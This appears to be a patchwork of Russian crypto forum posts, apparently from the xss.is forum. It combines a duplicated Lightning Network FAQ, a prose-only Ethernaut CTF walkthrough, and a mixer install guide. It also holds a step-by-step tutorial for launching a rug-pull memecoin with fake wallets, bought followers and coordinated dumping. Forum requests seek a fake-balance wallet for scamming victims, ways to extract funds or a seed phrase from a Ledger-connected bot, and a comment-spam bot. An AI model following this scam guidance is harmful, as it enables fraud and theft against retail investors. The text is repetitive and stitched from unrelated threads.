LN легко в использовании. Чтобы использовать Lightning Network, нужно загрузите кошелек Lightning. Через какое-то время все больше и больше кошельков будут интегрировать Lightning

Почти бесплатные биткоин транзакции. Такая транзакция всегда будет значительно дешевле, чем обычная биткоин-транзакция. Некоторые Lightning-транзакции имеют даже отрицательные сборы, то есть платят не майнерам, а пользователям сети!

Недостатки Lighting Network:

Платежи проиходят только между пользователями, находящиеся в сети. Нет возможности отправить средства на кошелек в оффлайне.

Сеть не способна осуществлять финансовые операции крупной суммы. Это связанно с ограниченной пропускной способностью маршрута. Открытие канала связано с внесением (заморозкой) суммы средств. Пока канал открыт - средствами воспользоваться не удасться.

Часто в сети происходят посреднические сбои, что приводит к поиску нового пира, на поиски которого может уйти несколько часов.

Сеть Lightning Network обладает прямой зависимостью от Bitcoin. В случае краха последней первая также потерпит неудачу.

LN не решит проблему масштабируемости окончательно, если исходить из того, что биткоин станет платежным средством в рамках всей планеты. Потому что пропускная способность сети останется ограниченной, и даже если каждому пользователю потребуется лишь одна открывающая и одна закрывающая канал транзакция в месяц, сеть сможет обслуживать не более 5 миллионов человек, т.е. меньше тысячной доли растущего населения Земли.

Сбои со стороны партнеров. В случае если один из партнёров не отвечает на запрос, поступающий от пользователя, то время ожидания может занять несколько часов. Только после отзыва пользователь сможет завершить операцию и получить контроль над собственными финансовыми средствами.

Отсутствует возможность выполнения платежей в режиме оффлайн. Платеж, выполняемый пользователем сети Lightning Network, является соглашением в виртуальной валюте Bitcoin в неизвестном объеме. Данное соглашение не требует обязательных доверительных отношений между его участниками – только при условии его выполнения в режиме онлайн.

FAQ:

Является Lightning Network открытой технологией?
Да, исходный код LN доступен для всех

Что такое Lightning Network?
LN - находящаяся в настоящее время в разработке система, которая позволит производить транзакции биткоинов "вне блокчейна", без необходимости в третьей стороне.

Нуждается ли Lightning Network в каком-либо согласовании с битокин-сетью для того, чтоб быть внедренной?
Нет, внедрение LN не требует каких либо согласований с биткоин сетью.
LN не является ни softfork ни hardfork изменением.
Вместо этого, LN "надстраивает" дополнительный уровень над биткоин блокчейном.

**Я слышал, что транзакции в Lightning Network происходят "вне блокчейна"... Значит ли это, что мой биткоин будет удален из блокчейна? **
Нет, ваш биткоин никогда, никогда (злобный смех) не покинет блокчейн.
Вместо этого ваш биткоин будет удерживаться на мультиподписном адресе все то время, пока канал открыт. Как только канал закрывается, крайняя транзакция записывается в блокчейн.

Я слышал, что Lightning Network потребует блокировки моего биткоина... это так?
Блокировка - неправильный термин в данном случае.
LN не сделает ваши деньги менее доступными, даже, по сути, наоборот, сделает их более доступными.
В первую очередь, у вас нет необходимости ждать подтверждений в LN, ваши деньги могут двигаться внутри сети практически постоянно,без задержек.
Во вторых, возврат ваших денег "обратно в блокченй" так же просто, как и отправка простой биткоин-транзакции. Вы просто дожидаетесь подтверждения и ваши деньги больше не "вне блокчейна"
Единственным исключением является случай, когда ваш канал крашится во время транзакции (вторая сторона транзакции внезапно отключается)
Только в этом случае у вас возникнет небольшая задержка перед тем, как вы сможете тратить ваши деньги. Длительность этой задержки будет зависеть от параметров, которые вы задали при установке канала (от нескольких часов до максимума в несколько дней)

Будет ли Lightning Network свой собственный блокчейн?
Нет, LN надстроена над биткоин-блокчейном. Блокчейн-транзакции необходимы для открытия и закрытия каналов между участниками сети.
Как только канал открыт, биткоин может передаваться "вне блокчейна" в обоих направлениях.
Транзакции внутри канала являются реальными биткоин-транзакциями, с тем исключением, что они не транслируются в основной биткоин-блокчейн в то время, пока канал открыт.
Вместо этого, все данные о транзакциях будут храниться локально у участников канала до тех пор,пока канал не будет закрыт.

Основной блокчейн битокоина защищен хэшрейтом более 4 ExaHash в секунду, а у Lightning Network не планируется никакого хэшрейта вообще... Как LN может быть защищена в той же степени, что основной блокчейн?
Безопасность LN базируется на "низлежащей" структуре безопасности битокин- блокчейна, LN не является отдельным блокчейном, LN является лишь "надостройкой".
Если в рамках канала возникает непредвиденная ситуацию (вторая сторона уходит в оффлайн), у вас всегда есть возможность выйти обратно в блокчейн (технически вы просто записываете последнее состояние канала обратно в основной биткоин- блокчейн)

Вы говорите, что Lightning Network использует реальные битокин транзакции... Но как они могут быть реальными, если они не пишутся в блокчейн?
Для ответа на этот вопрос, необходимо сначала понять, чем по сути является биткоин-транзакция. Факт заключается в том, что в действительности в биткоине нет как таковых "монет", есть только подписанные сообщения и апдейты (добавления) в блокчейн.
Для примера - Петя высылает Наташе 1 биткоин (за кокосовую стружку, да..))
Это называется p2p транзакцией, т.к. факт владения переходит напрямую от Пети Наташе.
Но Наташа, по факту, не получает "интерактивной монеты" от Пети. То, что происходит по факту - все узлы сети обновят свою локальную копию публичной базы.
Публичная база так же обновляется. "Монета", которая была зарегистрирована как Петина, теперь зарегистрирована как Наташина (не напрямую, конечно, а через адреса кошельков)

Вывод - перевод битокина не что иное, как подписанное сообщение.
В таком случае, когда Петя хочет выслать Наташе 1 биткоин, используя LN.
Петя отправляет свои деньги в "2 из 2" мультиподписной адрес.
Петя и Наташа оба подписывают сообщение о передаче прав владения биткоином от Пети Наташе.
Это сообщение является действительной биткоин-транзакцией, но нетраслируется в основную сеть. Вместо этого, Петя и Наташа хранят эту транзакцию (мы помним, подписанное вообщение) локально на своих машинах.
С точки зрения Наташи, это "дважды подписанное сообщение" является 1 биткоином, который может быть потрачен в любое время, просто оттранслировав это сообщение в основную сеть.
Из всего вышесказанного делаем глобальный вывод - Битокин транзакция = подписанное сообщение = транзакция LN
Суть любой транзакции - передача прав собственности.
В сети битокин мы меняем это право собственности, транслируя подписанные сообщения.
LN-транзакция это всего лишь дважды подписанное сообщение, которое так же является легитимной биткоин-транзакцией.

Cтандартная битокин-транзакция зависит от подтверждений в блокчейне... В таком случае, справедливо ли утверждать, что Lightning транзакция - то же самое, что и обычная биткоин-транзакция?
Хорошее замечания, они и вправду не являются одним и тем же.
Lightning транзакцию можно назвать транзакцией "с 0 подтверждений". Но,как только она транслируется в основной биткоин-блокчейн, она будет настолько же валидна, как и любая блокчейн-транзакция "с 0 подтверждений".
Оба типа транзакций будут обработаны майнерами биткоина, если они оплатят соответствующую мзду (комиссию).

Я слышал, что Lightning Network потребует от своих пользователей постоянного мониторинга блокчейна... это так?
Да, это так.
Пользователям будет необходимо запустить программное обеспечение, которое будет активно мониторить блокчейн на нарушения контракта (передача устаревшей транзакции)
В любом случае, этот мониторинг можно будет отдать на аутсорс третьей стороне.
Аутсорсинг не повлияет на вашу приватность, но вы должны доверять тому сервису, которому вы поручите эту работу.

Хорошая сторона в этом заключается в том, что, мы надеемся, это сподвигнет большее количество людей запускать "фулл ноды", которые позволят им заработать немного деньжат (*тут надо вставить ссылку на вопрос №7 из моего предыдущего перевода). Так же такую ноду можно будет запустить для мониторинга блокчейна (о чем говорилось в предыдущем абзаце). Теоретически, на этом так же можно немного заработать.

Могу ли я отправить средства из Lightning Network на обычный битокин- адрес?
В настоящее время - нет.
Для первой версии протокола, если вы хотите отправить "обычную" битокин- транзакцию используя ваш канал, вам будет необходимо закрыть канал, отправить деньги и затем заново открыть канал (т.е. 3 транзакции). В будущих версиях такая возможность будет рассмотрена.

Кто владеет и контролирует Lightning Network?
По аналогии с Биткоином, никто и никогда не сможет получить полный контроль над всей сетью.

Кто является изобретателем Lightning Network?
Joseph Poon и Thaddeus Dryja придумали и написали **The Bitcoin Lightning Network Whitepaper

Где можно почитать более подробную информацию о последних событиях в сфере внедрения Lightning Network?**
На их **сайте

Есть ли у Lightning Network свои "Lightning coins"?**
Нет, это не тот случай. LN будет использовать реальные BTC транзакции с, собственно, биткоинами и другими криптовалютами.

При использовании технологии Lightning Network необходимо ли будет мне доверять свои деньги третьему лицу?
Нет, система не построена на доверии третьим лицам, у вас остается полный контроль над вашими средствами. Если что то пошло не так, вы можете просто записать последнее состояние платежного канала, как обычную биткоин- транзакцию. Все ваши деньги будут возвращены на ваш адрес и это будет записано в блокчейн.

Я слышал,что в Lightning Network будет комиссия за транзакции... Это так? Кто будет собирать эту комиссию?
Да. Потенциально это может быть любой использующий ноду. Пример - Вася хочет перевести деньги Пете, но между Васей и Петей нет открытого канала. Но у Васи есть открытый канал с Наташей, а у Наташи есть канал с Петей. Вместо открытия прямого канала Вася-Петя, транзакция может быть осуществлена через Наташу по пути Вася-Наташа-Петя. В таком случае у Наташи появляется возможность запросить небольшую комиссию.

В предыдущем сценарии, что мешает Наташе кинуть всех на деньги?
Кратко - Наташа сначала отправляет транзакцию Пете, и лишь потом получает ее от Васи.
Некратко:
1. Петя начинает процесс транзакции, генерируя случайное число R,которое он будет некоторое время никому не разглашать
2. Петя хэширует R, получает хэш H
3. Петя передает H Васе, отправителю транзакции
4. Вася создает транзакцию денег по маршруту Вася-Наташа. Но эта транзакция становится дейтвительной только после включения в нее R. То есть транзакция временно является недействительной из за отсутствия R. Вася так же передает Наташе H(R), и Наташа знает, что H это хэш недостающего элемента R.
5. Наташа,в свою очередь, тоже создает транзакцию по маршруту Наташа-Петя. Но эта транзакция также действительна только в случае включения в нее R. То есть транзакция временно является недействительной пока у Наташи не будет доступа к сгенерированному числу R
6. Петя не дурак, и хочет получить свои деньги. Он предоставляет R Наташе, тем самым делая транзакцию Наташа-Петя действительной.
7. Т.к. Наташа тоже не дурак и хочет получить деньги от Васи, она может включить R в транзакцию Вася - Наташа, тем самым сделав ее действительной. Наташа понимает, что получила правильное число R, т.к. предварительно проверила, что хэш H(R)который она получила в шаге №4, действительно является хэшем числа R.
8. В то же время, Наташа передает R Васе. Вася теперь может использовать R как подтверждение перевода средств Пете.

Будет ли использоваться какая-либо форма майнинга для обеспечения безопасности Lightning Network?
Нет, безопасность обеспечивается майнерами биткоина в биткоин сети.

Есть ли у Lightning Network своя публичная база данных транзакций?
Нет

Зачем нужна Lightning Network?
Слабым место технологии блокчейн является плохая масштабируемость и низкая скорость работы, что уже вылилось в высокие комиссии сделавшие невыгодными микропереводы. Технология LN позволяет решить эти проблемы и снизить издержки путем создания быстрых платежных каналов "над блокчейном" с записью в блокчейн результатов своей работы по мере необходимости, а в перспективе позволит безопасно напрямую обмениваться монетами из разных блокчейнов.

Что такое платежный канал?
Адрес с мутиподписью "2 из 2" на который стороны его открывающие вносят свои депозиты для дальнейших расчетов.

Что происходит с биткоинами отправленными в платежный канал?
Они блокируются в основном блокчейне.

Сколько времени существует платежный канал?
Это решают его создатели, они могут держать его открытым столько времени сколько потребуется.

Мне нужно открыть платежный канал с каждым кому я хочу переслать биткоины?
Необязательно, если между вами и получателем можно постоить цепочку из уже существующих платежных каналов, то вы можете воспользоваться ей для осуществления платежа.

Что такое commitment transaction?
Это транзакции в Lightning Network описывающие перевод средств между пользователями. Могут быть отправлены в основной блокчейн как закрывающая платежный канал транзакция.

Кто может закрыть платежный канал?
Любая из сторон его открывших, как по обоюдному согласию, так и в одностороннем порядке.

Когда результаты операций в Lightning Network записываются в блокчейн?
Когда канал закрывается итоговый баланс всех расчетов записывается в блокчейн.

Что будет если одна из сторон канала исчезнет?
Оставшийся участник канала может закрыть его и вывести в блокчейн принадлежащие ему средства с помощью последней commitment transaction.

Что такое refund transaction?
Транзакция совершаемая при открытии канала и страхующая внесенный депозит от невозможности их забрать обратно, если другая сторона исчезнет, путем установки таймера жизни канала.

Что такое Hash time lock contracts (HTLC)?
Смарт-контракт с определенным сроком жизни указанным при его создании. Используется для исключения возможности мошенничества одной из сторон.

Почему API для lightning?
Мы считаем, что некоторые компании могут быть заинтересованы в компромиссе, где они получают большую часть преимуществ Lightning, сохраняя при этом свои интеграционные затраты как можно ниже. Вот что такое Strike: добавьте платежи Lightning в ваш бизнес в кратчайшие сроки и с минимальным влиянием на ваши операции.

Как это работает?
Мы получаем молниеносные платежи от вашего имени, суммируем их и периодически отправляем транзакцию биткойнов onchain на ваш кошелек.

Другими словами, вы можете предлагать мгновенные и дешевые платежи своим клиентам, и вы платите за старые добрые транзакции Биткойн, к которым вы привыкли.

Подождите ... это не делает вас доверенным сторонником?
Да, это так, но наша услуга требует только минимального доверия, потому что мы отправляем вам транзакцию Биткойн onchain всякий раз, когда суммарная сумма достигает настраиваемого порога.

Например, если вы установили порог выхода в 0.2 BTC, то вы никогда не доверяете нам более чем на 0,2 BTC.

Сколько вы будете взимать плату за эту услугу?

Мы все еще разрабатываем детали, но основная идея:

фиксированная плата за транзакцию Lightning;
автоматическое снятие средств (с минимальной суммарной суммой): бесплатно, мы платим комиссию за биткойн;
ручное снятие (любая сумма): вы платите комиссию за пользование сетью

Что произойдет, если человек, которому я хочу отправить деньги, находится в оффлайне?
Если вы отправите средства человеку, который сейчас не в сети, то ваши деньги будут отправлены Вам обратно.

Транзакции Lightning Network более анонимны?
Транзакции в Lightning гораздо более анонимны, чем в блокчейне биткоина, так как участники цепочек, по которым идет платеж, не могут видеть отправителя или получателя.

Как много я много я могу отправить средств за одну транзакцию?
По идее - сколько угодно, но на данный момент у Lightning Network много неполадок, в частности малая общая вместимость сети. Даже при отправке 40$ сеть не выдержит,а общая дневная нагрузка составляет около 50 000$

Будет ли какая-либо форма добычи для защиты сети Lightning?
Нет, безопасность обеспечивается биткоин-майнерами в сети биткоин.

Какие криптовалюты могут использовать Lightning Network?
Zcash, Ripple, Litecoin, Ethereum и многие другие.

Сколько транзакций в настоящее время обрабатывается в Lightning?
Этого мы никогда не узнаем. Это и не нужно, поскольку это убивает конфиденциальность. Вы лишь можете видеть исходные транзакции, с которыми был создан канал.

Какое будущее ожидает Lightning Network?
Данная "надстройка" над биткоином будет развиваться только вместе с ним. Новые решения, которые используются в Lightning Network способствуют популяризации криптовалют и началу развития микротранзакций в этой сфере.

Что произойдет, если человек, которому я хочу отправить деньги, находится в оффлайне?
Если вы отправите средства человеку, который сейчас не в сети, то ваши деньги будут отправлены Вам обратно.

Использование Lightning Network подразумевает, то что моя транзакция не будет в блокчейне?
Не совсем так. В блокчейне будет транзакция о открытии и закрытии канала. По ним видно изменения баланса пользователей, но не видно всей истории транзакций внутри канала.

У Lightning Network открытый исходный код?
Да, у Lightning Network открытый исходный код. Каждый может его посмотреть.

Транзакции Lightning Network более анонимны?
Транзакции в Lightning гораздо более анонимны, чем в блокчейне биткоина, так как участники цепочек, по которым идет платеж, не могут видеть отправителя или получателя.

Как много я много я могу отправить средств за одну транзакцию?
По идее - сколько угодно, но на данный момент у Lightning Network много неполадок, в частности малая общая вместимость сети. Даже при отправке 40$ сеть не выдержит,а общая дневная нагрузка составляет около 50 000$

Будет ли какая-либо форма добычи для защиты сети Lightning?
Нет, безопасность обеспечивается биткоин-майнерами в сети биткоин.

Кто изобрёл Lightning Network?
Таддеус Дрийя и Джозеф Пун.

Какие криптовалюты могут использовать Lightning Network?
Zcash, Ripple, Litecoin, Ethereum и многие другие.

Сколько транзакций в настоящее время обрабатывается в Lightning?
Этого мы никогда не узнаем. Это и не нужно, поскольку это убивает конфиденциальность. Вы лишь можете видеть исходные транзакции, с которыми был создан канал.

Какое будущее ожидает Lightning Network?
Данная "надстройка" над биткоином будет развиваться только вместе с ним. Новые решения, которые используются в Lightning Network способствуют популяризации криптовалют и началу развития микротранзакций в этой сфере.

Зачем нужна Lightning Network?
Слабым место технологии блокчейн является плохая масштабируемость и низкая скорость работы, что уже вылилось в высокие комиссии сделавшие невыгодными микропереводы. Технология LN позволяет решить эти проблемы и снизить издержки путем создания быстрых платежных каналов "над блокчейном" с записью в блокчейн результатов своей работы по мере необходимости, а в перспективе позволит безопасно напрямую обмениваться монетами из разных блокчейнов.

Что такое платежный канал?
Адрес с мутиподписью "2 из 2" на который стороны его открывающие вносят свои депозиты для дальнейших расчетов.

Что происходит с биткоинами отправленными в платежный канал?
Они блокируются в основном блокчейне.

Сколько времени существует платежный канал?
Это решают его создатели, они могут держать его открытым столько времени сколько потребуется.

Мне нужно открыть платежный канал с каждым кому я хочу переслать биткоины?
Необязательно, если между вами и получателем можно постоить цепочку из уже существующих платежных каналов, то вы можете воспользоваться ей для осуществления платежа.

Что такое commitment transaction?
Это транзакции в Lightning Network описывающие перевод средств между пользователями. Могут быть отправлены в основной блокчейн как закрывающая платежный канал транзакция.

Кто может закрыть платежный канал?
Любая из сторон его открывших, как по обоюдному согласию, так и в одностороннем порядке.

Когда результаты операций в Lightning Network записываются в блокчейн?
Когда канал закрывается итоговый баланс всех расчетов записывается в блокчейн.

Что будет если одна из сторон канала исчезнет?
Оставшийся участник канала может закрыть его и вывести в блокчейн принадлежащие ему средства с помощью последней commitment transaction.

Что такое refund transaction?
Транзакция совершаемая при открытии канала и страхующая внесенный депозит от невозможности их забрать обратно, если другая сторона исчезнет, путем установки таймера жизни канала.

Что такое Hash time lock contracts (HTLC)?
Смарт-контракт с определенным сроком жизни указанным при его создании. Используется для исключения возможности мошенничества одной из сторон.

взято с (с) bitcointalk

Всем привет. Продолжаю серию статей по разбору CTF заданий, которые связаны со смарт-контрактами. Надеюсь кого нибудь заинтересует данная тематика, статья написано больше для новичков, но предполагаю, что вы должны быть знакомы с solidity и теории кодирования на базовом уровне. Решать задачи я буду на такой платформе как ethernaut. Интересно, что сам CTF построен на отдельных контрактах.
1 статья: /threads/55340/#post-358160

Дан контракт с именем Fallback. В контракте 5 функций. Задача стать владельцем контракта и опустошить баланс.

Получим экземпляр контракта. Сверим адреса контракта и посмотрим адрес владельца.

constructor() функция, которая развертывает код в блокчейне с аргументами/параметрами, она вызывается только один раз. Тот кто развертывает контракт становится его владельцем.

modifier() это модификатор функции, обычно проверяет условие перед выполнением функции. В примере указано, что вызывать функцию может только владелец контракта.

contribute() функция, которая хранит значение вызывающего эту функцию.
Если значение больше владельца контракта, то вызывающий функцию становится владельцем контракта. Обратите внимание, что require создает требование отправителю эфира и логику contributions в которую заносится значение.

getContribution() функция получения значения нашего вклада через неё мы можем узнать количество нашего вклада.

withdraw() позволяет выводить баланс только владельцу контракта.

receive() функция, которая выполняется при отправки эфира, с требованием, у нас должно быть значение(вклад) в contributions.

Транзакции в Ethereum это по своей сути сообщения с полезной нагрузкой, которые носят в себе различные данные. Чтобы менять состояние контракта нам нужно отправлять транзакции. У функции есть своя сигнатура - первые 4 байта, которые являются его идентификатором. В EVM проверяет идентификатор диспетчер, если ничего не подходит вызывается специальная функция, если она существует.

Вызовем contribute со специальным аргументом, объектом, с начальным значением, которая вложиться в нашу транзакцию, далее отправим транзакцию в контракт с нашим объектом, проверим стали ли мы владельцем контракта и тогда получим право вывести эфир и посмотрим баланс контракта.

Таким образом мы прошли 1 уровень.

Посоветуйте анонимный биткойн кошелёк.

Quake3 said:

Обменяйте киви на биткоин

Click to expand...

admin said:

советую даже для мелких платежей начать использовать крипту.

Click to expand...

Понял, спасибо за разъяснения. Так как пока далек от темы крипты могли бы посоветовать какими кошельками рекомендуете пользоваться?
Видов крипто валют, много, кошельков еще больше. Мнения везде разные.
Поэтому ваши оба мнения для меня более заслуживающие доверия. Был бы признателен за рекомендации и советы. Спасибо)

Авторство: hackeryaroslav​

Источник:xss.is​

Интро​

Торговля криптовалютой — это всегда риск, а с мемкоинами она превращается в настоящее казино. Почему? Подводных камней здесь масса: от рагпулов и мгновенных фиксаций прибыли "умными деньгами" до множества других нюансов. Сегодня я не только расскажу, как создаются такие токены, но и покажу, как запустить свой собственный мемкоин, что делать, если он «выстрелит», и как управлять всем процессом шаг за шагом. Даже если вы полный новичок в крипте, к концу статьи вы поймете, как это работает.

Почему это так прибыльно?​

Мемкоины — это не просто тренд, а катализатор для нового поколения инвесторов. В условиях текущего буллрана множество людей без опыта рвутся на рынок, пытаясь успеть на волне хайпа. Особенно это заметно среди молодежи из TikTok, которая вдохновляется историями о мгновенных успехах, как, например, с токеном ChillGuy. Подобные истории приводят к пампу всего, что оказывается в тренде.

​

Недавний пример скама связан с девушкой по имени Hawk Tuah.

​

Что произошло?​

Она объявила о запуске своего токена в соцсетях, но подвох был в том, что инсайдеры заранее скупили почти 90% эмиссии токена.

​

В результате, по подсчетам, Hawk Tuah заработала около 4 миллионов долларов.

​

Конечно, её популярность сыграла свою роль, и токен смог «выстрелить», но даже без известности можно создавать токены, цепляясь за тренды, и зарабатывать на этом. Давайте разберемся, как это сделать.

Итак, почему мемкоины обрушиваются?​

• Синхронные продажи крупных держателей. Девелоперы (или инсайдеры) начинают массово продавать токен, едва на рынок приходит интерес. Новички остаются с обесцененными активами, а инициаторы фиксируют прибыль.
• Отсутствие реального интереса. Если мемкоин не зацепил аудиторию, он быстро теряет капитализацию.

Создаем свой первый скам токен​

Самая популярная платформа для запуска мемкоинов — Pump.fun. Известные проекты последних месяцев, такие как GOAT и PNUT, стартовали именно там, достигнув капитализации в миллиарды долларов. Однако наш фокус не на масштабах, а на быстром запуске.

​

Пример схемы и почему такие токены падают:

​

Тут у нас один из ключевых факторов обвала — синхронные продажи с множества кошельков. Дев начинает массово сливать токен, как только на рынок поступает активный спрос. Покупатели остаются с «копейками», а инициаторы получают свою прибыль.

На скрине видно, что множество кошельков с пометкой начали продавать на мелкие суммы одновременно — очевидно дев слил все токены и получил свою прибыль.

Какие есть подходы к созданию мемкоина?

1. Автоматизированные боты
   Можно написать собственных ботов, которые будут покупать токен с нескольких кошельков и синхронно продавать по нажатию кнопки.

2. Ручной подход
   Альтернативно, вы можете использовать свой дев-аккаунт: сначала купить токен, а затем распределить его между другими кошельками. Это создает иллюзию активности, но платформы, отслеживающие такие транзакции, помечают это как слив токена. Это, в свою очередь, часто привлекает хомяков, хотя реального интереса здесь нет.

3. Телеграм-боты
   Есть платные автоматизированные боты для таких операций, но подписки на них стоят дорого. Это вариант для тех, кто всерьез планирует заниматься мемкоинами.

Секрет успеха

Успешный мемкоин — это:

• Актуальная тематика (трендовая тема или хайп);
• Соцсети (достаточно сайта и Twitter-аккаунта).

Мы создадим базовый токен, купим его на небольшую сумму с дев-аккаунта, создадим простой сайт и напишем пару постов в телеграм. Я не буду гарантировать успех схемы, опять же, нужно дополнительная работа по соц сетям и множество попыток пампа.

Теперь давайте приступим)

Заходим на сайт Pump.fun, вот что мы видим:

​

Подключаем любой удобный крипто кошелек, я сделал Phantom.

​

Сейчас в тренде идет собака, которое ест яблоко. Основной мемкоин разогнали до почти 50 млн долларов капитализации. А есть другие вариации? Спустя пары минут гугла, я нашел один прикольный)))

​

Под быструю руку создадим вебсайт, он состоит всего из одного файла - index.html, другого нам не надо. Суть это просто зацепить пользователя и просто показать наличие хоть какого нибудь сайта:

​

Красота, для теста подойдет. Также на быструю руку создадим тг канал и посты:

​

Для большей доверенности, можно подогнать реакции на посты, и пару сотен ботов подписчиков. Еще больше иллюзии вовлеченности.

Загрузил сайт на Vercel, популярный хостинг. В прошлых статьях я объяснял как это сделать, воспользуйтесь поиском.

​

Давайте перейдем к созданию токена, предварительно я закинул 5$ на покупку токена, но немного ошибся, тк это не покроет конские комисии самого pump.fun и phantom.

​

Не забываем вставить линки на соц сети:

​

Не делайте как я, этой суммы не хватило на транзакцию, я бы порекомендовал с 0.05 соланы, что чуть больше 10 долларов по курсу:

​

Хорошо, токен создан, если бы транзакция прошла у нас бы нарисовался неплохой график. Также есть возможность попасть на главную страницу pump.fun, что-то типо рандома, там легко разгоняют токен до 30-60к долларов, дальше обычно дев сливает.

​

После создания токена вы можете:

• Купить токены на дев-аккаунт.
• Распределить часть между несколькими кошельками для имитации децентрализации.
• Запустить активности в соцсетях, включая розыгрыши и аирдропы.

Если первый раз не прошло, создавайте таких же еще раз, пока не выстрелит, это нормальная практика, сливайте предыдущий, создавайте новый до момента, пока он не выстрелит.

Но все равно, главное понять как это легко работает. Можно создать качественный мемкоин, запустить его не один раз и он точно выстрелит, таких коинов сотни каждый день.

Я бы назвал это тип фишинга, хотя это намного больше чем фишинг, это целая индустрия.

Заключение​

Мы разобрали, как создаются мемкоины, почему они могут быть прибыльными, и как их правильно запускать. В этом процессе важна скорость: чем быстрее вы адаптируетесь к тренду, тем выше ваши шансы на успех. Используйте полученные знания, экспериментируйте, и кто знает, возможно, ваш мемкоин станет следующим хайпом))

Помните: эта индустрия — больше, чем просто фишинг. Это сложный микс психологии, маркетинга и технологий. Удачи!

ваши мнения?
слухи новости пресейлы соучастия

хорошенько шоб так макнуться

В общем , предложили такую тему, что с такого кошелька нужно получить транзакцию (около 10$), есть кто сможет помочь с этим?

Доброго времени суток! Прошу пожалуйста отписаться мне в ПМ тем, кто разбирается в этой штуке (Боту - чекеру, который выявляет по АМЛ насколько в % загрязнена крипта). Буду признателен.

Имеется бот, подключен ledger, бот на линуксе, стоит ledger-live и со скрина балик там есть, какие есть варианты снять деньги или сидку с подключеным леджером?

Поздравляю с наступающим халвингом через 19 блоков


When Is The Next Bitcoin Halving? [Updated] | CoinMarketCap | CoinMarketCap

Use our Bitcoin halving countdown to see the estimated date for 2024. Learn about the Bitcoin halving cycle, the previous dates, and the block reward schedule.

 coinmarketcap.com


Туземун? Все готовы? закупились на всю котлету? )

Здравствуйте, я уже довольно долго борюсь с этой концепцией, меня беспокоит: как безопасно перейти от наличных к XMR? Лично я пришел к выводу, что лучший способ — это НЕ использовать наличные деньги и зарабатывать XMR на продаже услуги, а затем переводить их на другой кошелек, подключенный к локальному узлу.

Я не уверен в своем решении, я ценю любые мнения!

Crypto merch​

shkeeper​

https://shkeeper.io/
BTC, ETH, LTC, DOGE, XMR, XRP, TRX, BNB, USDT (ERC20, TRC20, BEP-20), USDC(ERC20, TRC20, BEP-20) от хостера vsys.host open source

plisio​

https://plisio.net/

coinbase​

https://www.coinbase.com/commerce
Нужно иметь мерчант аккаунт.

Payeer​

https://payeer.com/en/solutions/
https://payeer.com/merchant/
BTC, LTC, ETH, USDT, DASH, XRP, BCH will be converted to USD, EUR or RUB (no risks with rates) and deposited to your Payeer account, instantly use balance for crypto payouts.

nowpayments.io​

https://nowpayments.io/

coinpayments​

https://www.coinpayments.net/

Cryptomus​

https://cryptomus.com
https://www.gofuckbiz.com/showthread.php?t=58335&page=8

Crystalpay​

http://crystalpay.org/
https://t.me/CrystalPAY_bot

Cryptadium​

cryptadium.com

bitapi​

https://bitapi.me/

cryptomus​

cryptomus.com

coingate​

coingate.com

• lighting network

Self hosted​

All Crypto​

• https://github.com/dvpay/ - Bitcoin, USDT (TRC20)
• https://github.com/bitcart/bitcart - Bitcoin, Bitcoin Lightning, Bitcoin Cash, Monero, Ethereum, Binance Smart Chain, Smart Bitcoin Cash, Litecoin, Polygon, GlobalBoost, Tron, Ergon, Groestlcoin

BTC​

https://github.com/btcpayserver/btcpayserver

Monero​

https://github.com/RuiSiang/monero-merchant
https://github.com/moneropay/moneropay
https://github.com/monero-integrations/monerowhmcs

P.S. Давайте пополнять список на вопрос абузоустойчивость, комиссий и преимуществ

нужно получить около 1-2к зелени, вопрос могут ли забанить кошелек или дать обязательную кус?

North Korea’s Lazarus Group have moved $63.5m (~41000 ETH) from the 2022 Harmony bridge hack through Railgun before consolidating funds and depositing on three different exchanges (Binance, OKX and Huobi).

Full thread and analysis:

__https://twitter.com/x/status/1614771861266792449

Перепрошивка кошелька Binance Crypto (USDT) Требуется перепрошивка

кто может сделать фейк кипту на любом популярном кошельке? (Екзодус,траст,сейфпал, тронлинк).
нужен фиксированый баланс.

Например: даю клиенту 12 фраз для входа. он заходит и у него отображен баланс в усдт.

знаю делают так и при выводе просит оплатить комиссию пишет что недостаточно комиссии для вывода. делают под скам.
мне достаточно что бы был показан просто баланс.

как это делают и кто может такое сделать? естественно не бесплатно.

Привет, братцы Ищу бота, спамера для автоматической публикации комментариев в мемкоинах. Если у кого-то есть готовое решение или предложения по созданию, буду благодарен, если сможете поделиться или подсказать, на какую сумму можно рассчитывать за такую разработку. Интересует максимально автоматизированный процесс. Рассмотрю любые варианты, желательно в дар. Заранее спасибо!

Wasabi криптокошелёк-миксер. Coinjoin​

Wasabi это криптовалютный кошелек, работающий с блокчейном BTC. Доступен в виде приложен для Windows, MacOS (Intel, M1, M2), Linux. Мобильного приложения не имеет.
Официальный сайт https://wasabiwallet.io

Надеюсь кому то будет полезно!)

Установка
Рассмотрим установку на примере ОС Whonix
Необходимо загрузить установочный пакет .deb на сайте https://wasabiwallet.io/
Сохраните его, например, в папку /home/user/Downloads/

Далее открыть терминал и выполнить команду

sudo apt install /home/user/Downloads/Wasabi-2.0.3.deb

(исправьте название файла в соответствии с тем, который был загружен с сайта)
По окончании установки ярлык Wasabi появится в меню программ, в разделе Office

Также можно использовать для запуска консольную команду wassabee

При включении Wasabi в Whonix следует отключить встроенный в Wasabi Tor. Будет использоваться Tor-соединение установленное операционной системой через Whonix-Gateway.
Это делается в настройках приложения (кнопка Settings внизу слева, там выключить Network anonimization (Tor).
Подробнее об использовании Wasabi рассказано на сайте кошелька, в документации и FAQ.

Создание кошелька​

При первом запуске Васаби будет открыт диалог для создания нового кошелька. Можно установить уникальное имя для кошелька, чтобы помнить, для чего он. На следующем шаге Васаби покажет 12 слов восстановления кошелька. Они должны быть тщательно и точно сохранены в правильном порядке, так как они необходимы (вместе с паролем) для восстановления этого кошелька на другом компьютере или в другом приложении кошелька. Затем выберите очень безопасный пароль, так как это шифрует секреты, и не должны догадаться другими. Вам всегда понадобится этот пароль, чтобы потратить свои биткойны, так что будьте очень осторожны, чтобы поддержать его должным образом. Убедитесь, что вы храните резервную копию своих слов восстановления в другом месте, чем резервное копирование вашего пароля

Затем задайте безопасный пароль. Вам всегда будет необходим этот пароль, чтобы потратить свои биткойны, так что будьте очень осторожны, чтобы сохранять его должным образом. Убедитесь, что храните резервную копию своих слов восстановления не в том же месте, где сохраняете резервную копию пароля.

Пополнение кошелька​

CoinJoin
